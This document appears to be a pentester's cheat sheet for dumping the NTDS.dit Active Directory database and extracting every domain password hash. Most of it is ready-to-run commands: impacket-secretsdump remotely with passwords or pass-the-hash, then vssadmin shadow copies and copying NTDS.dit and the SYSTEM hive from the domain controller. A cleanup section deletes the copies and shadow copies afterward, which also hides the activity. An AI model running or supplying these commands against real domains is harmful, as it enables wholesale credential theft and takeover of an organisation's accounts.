NTDS.dit Dumping
What It Is
NTDS.dit is the Active Directory database on Domain Controllers, storing user/group info, security descriptors, and password hashes for every domain account. Dumping it via secretsdump gives every credential in the domain simultaneously. Requires high-priv access (Domain Admin or equivalent).
Attack Flow
Obtain DA (or equivalent) creds → secretsdump remotely via DRSUAPI
OR
RDP to DC → shadow copy NTDS.dit + SYSTEM → extract locally → secretsdump offlineMethod 1 - Remote Dump (DRSUAPI)
impacket-secretsdump '<domain>/<user>:<password>'@<dc-ip>
# NTLM hashes only
impacket-secretsdump '<domain>/<user>:<password>'@<dc-ip> -just-dc-ntlm
# Full dump with history, user status, output to file, using a hash instead of password
impacket-secretsdump '<domain>/<user>'@<dc-ip> -history -user-status -just-dc-ntlm -outputfile ntdshistory -hashes '<lm:nt hash>'Working With Dumped Hashes
Paste hashes into Excel → Data > Text to Columns > Delimited > ":"Method 2 - RDP + Shadow Copy (When Remote Dump Is Blocked)
RDP to the DC:
Username: <domain>/<user>
Computer: <target-ip>Files required:
C:\Windows\NTDS\NTDS.dit
C:\Windows\System32\config\SYSTEMLocate the NTDS drive:
Get-ItemProperty Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters -Name "DSA Database file"reg query "HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters" /v "DSA Database file"Create a shadow copy:
vssadmin create shadow /for=C:Note the returned shadow copy device path, you'll need HarddiskVolumeShadowCopyX for the copy commands below. Confirm the correct drive letter and volume number before copying; paths differ by host.Copy files out of the shadow copy:
copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\Windows\NTDS\NTDS.dit" C:\Windows\Temp\ntds.dit.save
copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\Windows\System32\config\SYSTEM" C:\Windows\Temp\system.saveAlternative - save SYSTEM hive directly:
reg save HKLM\SYSTEM C:\Windows\Temp\system.saveClean up shadow copies:
vssadmin list shadows
vssadmin delete shadows /shadow={ShadowCopyId}Housekeeping (Before Leaving the DC)
- Extract
ntds.dit.saveandsystem.saveto your local machine - Permanently delete both files from the DC
- Confirm all shadow copies are deleted (
vssadmin list shadowsshould be clean)
Extract Hashes Offline
impacket-secretsdump -system /path/to/system.save -ntds /path/to/ntds.dit.save LOCAL -outputfile dumped_hashes